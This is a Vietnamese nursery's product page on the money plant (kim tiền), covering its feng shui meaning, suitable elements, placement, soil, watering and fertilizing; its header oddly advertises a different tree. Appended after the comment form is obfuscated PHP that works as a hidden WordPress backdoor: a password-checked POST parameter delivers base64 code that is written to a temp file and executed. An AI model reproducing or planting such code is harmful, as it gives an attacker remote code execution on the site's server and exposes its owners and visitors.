Cây kim tiền trong phong thủy

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Kim tiền là loại cây cảnh dễ trồng, dễ chăm sóc và ít sâu bệnh nên được những người chơi cây cảnh ưa chuộng bởi cả ý nghĩa phong thủy. Vậy ý nghĩa phong thủy của cây kim tiền là gì? Hãy cùng https://vuoncayhoabinh.com tìm hiểu nhé!

 

Cây kim tiền trong phong thủy
Cây kim tiền trong phong thủy

Sơ qua về cây kim tiền

Cây  thuộc loài cây khóm ( bụi ), có lá xanh mướt, thân mập từ gốc đến thân, rễ mọc thành chum, không cần ánh sáng mạnh và có thể trồng trong nhà mà không sợ héo. Kim tiền thích hợp trong môi trường đất khô hạn và không cần tưới nhiều.

 

Ý nghĩa của cây kim tiền

Cái tên đã bao gồm ý nghĩa của nó: cây kim phát tài. Cây có thân vươn cao, lá xanh hướng lên. Điều đó tượng trưng cho bàn tay hứng lộc trời cao, mang ý tiến lên, tiền bạc lúc nào cũng dồi dào và đến liên tục.

Cây kim tiền có nhiều tác dụng, trước hết là cung cấp oxy, thanh lọc không khí trong lành và xanh sạch hơn. Cây kim tiền còn có tác dụng phủ xanh không gian sống, tô điểm và làm đẹp thêm cho ngôi nhà của bạn. Người ta thường chọn kim tiền làm quà tặng mừng tân gia hay khai trương bởi nó có tác dụng phong thủy rất tốt.

 

Cây kim tiền trong phong thủy
Cây kim tiền trong phong thủy

 

Kim tiền hợp mệnh gì, tuổi nào?

Cây kim tiền rất được dân phòng, kinh doanh và nhiều người yêu thích bởi tính phong thủy của nó. Tên gọi đã hiện lên y nghĩa tốt cho phong thủy. Người trồng cây này sẽ gặp được nhiều may mắn, thuận lợi trong buôn bán và kinh doanh. Mọi thứ đều thuận buồm xuôi gió, tiền bạc phú quý luôn gõ cửa.

 

Cây kim tiền hợp mệnh gì? Có phải ai cũng hợp?

Bản thân tên gọi của cây đã mang lại may mắn và thịnh vượng phú quý, tốt đẹp cho người trồng nên ai cũng có thể trồng cây kim tiền. Cây phù hợp với hầu hết các tuổi và ngũ hành. Ai cũng có thể sở hữu một châu cây kim tiền để làm cảnh, trưng tài lộc theo ý thích của mình.

Bạn nên lưu ý vài chi tiết sau để vượng phong thủy được tốt nhất

Những người thuộc mệnh Mộc, Hỏa rất phù hợp trồng cây kim tiền bởi theo ngũ hành tương sinh, Mộc sinh Hỏa đều tốt.

Cây phát triển và được nuôi dưỡng trong đất nên người mệnh Thổ cần chọn chậu cây hoặc bình màu đỏ, những màu Hỏa để bổ trợ tương sinh.

Những người mệnh Kim, Thủy nên chọn chậu cây màu trắng hoặc vàng bởi đó là 2 màu tương trợ rất tốt. Kim sinh Thủy, Thủy sinh Mộc.

Khi trồng cây trong nhà hay bàn làm việc mà cây tự dưng chết hay héo khô là điềm xấu mà ai cũng cần tránh. Muốn cây kim tiền phát triển tốt bạn cần chú ý cả vị trí đặt cây.

 

Các vị trí đẹp đặt cây kim tiền

Đặt cây tại vị trí hợp phong thủy nhưng ánh sáng và nhiệt độ không phù hợp thì sẽ ảnh hưởng đến quá trình phát triền của cây. Bạn cần chú ý 2 yếu tố trên để đặt cây đúng chỗ.

Tiền sảnh, đại sảnh: với những tòa nhà văn phòng hay mặt phố có không gian rộng và ánh sáng nhiều giúp cây kim tiền hấp thụ, quang hợp và đón được nhiều tài lộc cho cả tòa nhà.

Bàn làm việc: với những dân văn phòng, dân kinh doanh hoặc những nghề liên quan đến tiền bạc, thăng tiến chức rất ưa chuộng việc đặt cây kim tiền nhỏ tại bàn làm việc. Họ tin rằng cây kim tiền sẽ giúp công việc thuận buồm xuôi gió, thăng quan tiến chức nhanh chóng.

Đặt cây kim tiền tại cửa sổ, ban công giúp điều hòa không khí, trang trí nội thất thêm đẹp và hiện đại.

 

Các vị trí đẹp đặt cây kim tiền
Các vị trí đẹp đặt cây kim tiền

 

Cách trồng và chăm sóc cây kim tiền

Kim tiền tuy dễ sống, dễ trồng và chăm sóc nhưng bạn vẫn cần lưu ý các yếu tố để cây khỏe mạnh và phát triển tốt hơn, không bị nhiễm sâu bệnh.

Về cách chọn đất trồng

Không nên trồng kim tiền ở nền đất thịt, đất có mật độ đặc sẽ giữ nước làm rễ cây bị thối, lá vàng úa. Nên chú ý thay đất 3 tháng 1 lần để có hiệu quả cao.

Sử dụng đất có độ mùn xốp, thoát nước tốt. Trộn đất với mùn trấu, xỉ than nghiền nhỏ để tạo độ thông thoáng, giúp cây phát triển nhanh hơn. Bạn có thể sử dụng các loại đất vi sinh có bán tại cửa hàng cây cảnh để đất được tối ưu mà không tốn nhiều nước khi chăm sóc.

Về cách tưới nước

Với cây kim tiền thì không cần tưới nhiều nước vì tưới quá nhiều sẽ khiến cây thối rễ và rụng lá. Một tuần chỉ cần một lần tưới phun sương, không tưới cây đẫm. Sau khoảng 4 – 5 tuần, bạn mang cây ra ngoài sân, tưới ướt đẫm một lần rồi để ráo nước. Sau đó có thể mang cây vào nhà để trong bàn làm việc hoặc bất cứ chỗ nào bạn muốn.

 

Cách trồng và chăm sóc cây kim tiền
Cách trồng và chăm sóc cây kim tiền

Nếu cây kim tiền trồng ngoài sáng hay tiền sảnh thì thời gian tưới nước ngắn hơn trồng cây trong nhà.

Trước khi trồng bạn nhớ chọn loại đất tơi xốp, trộn thêm phân lân, mùn gỗ hoặc xỉ than trộn tơi lên rồi cho vào chậu. Đây là cách tốt nhất để cung cấp dinh dưỡng cho cây phát triển nhanh.

Về cách bón phân

Khi cây chuẩn bị đẻ nhánh, bạn có thể bón thúc, dùng thêm phân lân NPK để cung cấp thêm dinh dưỡng cho cây. Lưu ý bón cách gốc 1-cm để cây không bị chết vì xót.

Trên đây là những thông tin hữu ích về cây kim tiền trong phong thủy cũng như cách chăm sóc hiệu quả mà https://vuoncayhoabinh.com cung cấp cho các bạn. Chúc các bạn sở hữu chậu cây kim tiền tươi tốt và gặp nhiều may mắn trong cuộc sống.

 

 

 

 

 

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}